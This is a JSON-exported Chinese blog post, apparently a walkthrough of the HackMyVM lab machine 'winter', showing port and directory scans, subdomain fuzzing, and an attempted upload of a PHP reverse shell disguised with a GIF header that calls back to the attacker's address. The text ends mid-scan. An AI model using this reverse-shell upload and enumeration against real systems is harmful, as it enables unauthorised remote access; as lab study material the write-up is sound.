{"id":787,"date":"2024-08-21T20:25:18","date_gmt":"2024-08-21T12:25:18","guid":{"rendered":"http:\/\/162.14.82.114\/?p=787"},"modified":"2024-08-21T20:25:18","modified_gmt":"2024-08-21T12:25:18","slug":"hmv-_-winter","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/787\/08\/21\/2024\/","title":{"rendered":"hmv[-_-]winter"},"content":{"rendered":"<h1>winter<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253537.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253537.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240818235813789\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253539.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253539.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819000154145\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 39:47:4a:a2:1d:53:5a:d4:9e:4e:2e:61:61:e9:bb:82 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDqHXuDutkB5xoqMwpMpuS7umCM8ebmE\/c+fpbf0PXFflthVpqP4T+\/QVA6aGN2bOAAJfn2l2+UGVV7zHM7jnXCHIF18keM8KGrl8+ZIY7XhH1k2zvbXmAs1NgyxJ9bSi8IInwqnXwihfTDql0Cv+zASrueaieIjm1g4a1L5MwcrCcBfQjuWrdzTTu6BG3tr62rWfplin+6boUVGtqAuGHeHtbMxMAM7ZrpvT4bBe2I1M7euxHiaThU1tKpAIgn67tUHeaoCuAHR3TkTBZcucb+EQ9O2NUnMYpiwJG0nl24CEX8ji2TmaQxJ9NbDd7WDIt\/HNKMbCGai4xeo5yCCMDN\n|   256 dc:48:cb:c6:f5:41:2c:d8:5a:87:c6:2d:ff:35:ae:15 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK16DEyJyG1YywvWJ843ae4Zc27Nl0rg15gavl8qNIjip6lvTFUxDMdUkhodjyjJFWsYqSe+CoKRq4mJbU5wXRA=\n|   256 26:05:e1:dd:1c:60:af:ef:4b:b7:e5:01:ae:e2:52:ca (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBN0iUGreHnDGFQiZVkBfMmqbEYER7FPKBayP9XWoGza\n80\/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: catchme\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.106\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   403,404,301,401\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 201]\n\/news.php             (Status: 302) [Size: 855] [--&gt; login.php]\n\/about.php            (Status: 302) [Size: 1018] [--&gt; login.php]\n\/contact.php          (Status: 302) [Size: 1213] [--&gt; login.php]\n\/login.php            (Status: 200) [Size: 900]\n\/home.php             (Status: 302) [Size: 904] [--&gt; login.php]\n\/signup.php           (Status: 200) [Size: 856]\n\/logout.php           (Status: 302) [Size: 0] [--&gt; login.php]\n\/robots.txt           (Status: 200) [Size: 237]\n\/settings.php         (Status: 302) [Size: 1259] [--&gt; login.php]\n\/fileinfo.txt         (Status: 200) [Size: 52]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253540.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253540.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819001003197\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n****** Winter ******\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt                              \nLook for some real vulnerabilities ;)\n\nid\nwhoami\nls\npwd\nnetstat -ano\ncatchme\nwinter\ncd\ncd ..\/\nftp\nssh\nhttp\nsmtp\nmanager\nadmin\nsuperadmin\nceo\ncto\nhttps\ntftp\nnano\nvim\nparrot\nlinux\nshell<\/code><\/pre>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.10.106\/login.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253541.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253541.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819001044390\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5148\u6ce8\u518c\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">username\npassword<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253542.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253542.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819001201920\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253543.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819001218625\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u795e\u9b54\u60c5\u51b5\uff0c\u53d1\u73b0\u4fe9\u6d1e\uff0c\u4e00\u4e2a\u662f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\uff0c\u4e00\u4e2a\u662f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u94fe\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253544.svg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253544.svg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"OS command injection\" \/><\/div><\/p>\n<p>\u8fd8\u6709\u82e5\u5e72\u793a\u4f8b\uff0c\u63a5\u7740\u770b\u76ee\u5f55\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\"># http:\/\/192.168.10.106\/fileinfo.txt\na small hint for you :)\nwinter is my domain name!<\/code><\/pre>\n<p>\u6dfb\u52a0 dns \u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-bash\">192.168.10.106  winter<\/code><\/pre>\n<p>\u4e5f\u6709\u53ef\u80fd\u662f\u6709\u540e\u7f00\uff0c\u6682\u65f6\u4e0d\u77e5\u9053\u3002\u3002<\/p>\n<h4>fuzz<\/h4>\n<p>\u5c1d\u8bd5 fuzz \u4e00\u4e0b\u57df\u540d\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -c -u http:\/\/$IP -H &quot;Host: FUZZ.winter.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12\nffuf -c -u http:\/\/$IP -H &quot;Host: FUZZ.winter&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12\nffuf -c -u http:\/\/$IP -H &quot;Host: winter.FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u6536\u83b7\u3002\u3002\u3002\u3002<\/p>\n<p>\u7ee7\u7eed\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253545.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253545.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819002826767\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e0a\u4f20\u7684\u5730\u65b9\u4e86\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728<code>upload<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253546.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253546.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819002906069\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8fd9\u662f\u4e00\u4e2a\u65b9\u5411\uff01<\/p>\n<h3>\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n<p>\u5148\u5c1d\u8bd5\u4e00\u4e0b\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ file shell.jpg                                                                                                       \nshell.jpg: GIF image data, version 89a, 2570 x 8224\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ head shell.jpg                                                     \nGIF89a\n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.105&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253547.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253547.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819004730861\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u4f46\u662f\u672a\u88ab\u89e3\u6790\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e<\/h3>\n<p>\u5c1d\u8bd5\u91cd\u65b0 fuzz \u4e00\u4e0b\uff0c\u6211\u611f\u89c9\u8fd8\u662f\u6709\u7528\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ffuf -c -u &quot;http:\/\/winter&quot; -H &quot;Host: FUZZ.winter&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fs 201\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/winter\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: FUZZ.winter\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 201\n________________________________________________\n\nmanager                 [Status: 200, Size: 199, Words: 12, Lines: 15, Duration: 8ms]\ncmd                     [Status: 200, Size: 198, Words: 12, Lines: 15, Duration: 2ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 3076 req\/sec :: Duration: [0:00:08] :: Errors: 0 ::<\/code><\/pre>\n<p>\u4f7f\u7528 fs \u8fc7\u6ee4\u53ef\u4ee5\u627e\u5230\u7279\u6b8a\u7684\uff1a<\/p>\n<pre><code class=\"language-text\">192.168.10.106     winter\n192.168.10.106     manager.winter\n192.168.10.106     cmd.winter<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253548.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253548.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819005441711\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253549.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253549.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819005720602\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253550.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253550.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819005752936\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/winter\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   403,404,301,401\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 201]\n\/news.php             (Status: 302) [Size: 855] [--&gt; login.php]\n\/contact.php          (Status: 302) [Size: 1213] [--&gt; login.php]\n\/about.php            (Status: 302) [Size: 1018] [--&gt; login.php]\n\/home.php             (Status: 302) [Size: 904] [--&gt; login.php]\n\/login.php            (Status: 200) [Size: 900]\n\/signup.php           (Status: 200) [Size: 856]\n\/logout.php           (Status: 302) [Size: 0] [--&gt; login.php]\n\/robots.txt           (Status: 200) [Size: 237]\n\/settings.php         (Status: 302) [Size: 1259] [--&gt; login.php]\n\/fileinfo.txt         (Status: 200) [Size: 52]\nProgress: 701308 \/ 882244 (79.49%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 703036 \/ 882244 (79.69%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/manager.winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/manager.winter\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   401,403,404,301\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 199]\n\/news.php             (Status: 302) [Size: 855] [--&gt; login.php]\n\/contact.php          (Status: 302) [Size: 1243] [--&gt; login.php]\n\/about.php            (Status: 302) [Size: 1558] [--&gt; login.php]\n\/home.php             (Status: 302) [Size: 907] [--&gt; login.php]\n\/login.php            (Status: 200) [Size: 1275]\n\/logout.php           (Status: 302) [Size: 0] [--&gt; login.php]\nProgress: 339772 \/ 882244 (38.51%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 341053 \/ 882244 (38.66%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/cmd.winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/cmd.winter\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   401,403,404,301\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 198]\n\/shellcity.php        (Status: 200) [Size: 1040]\nProgress: 267346 \/ 882244 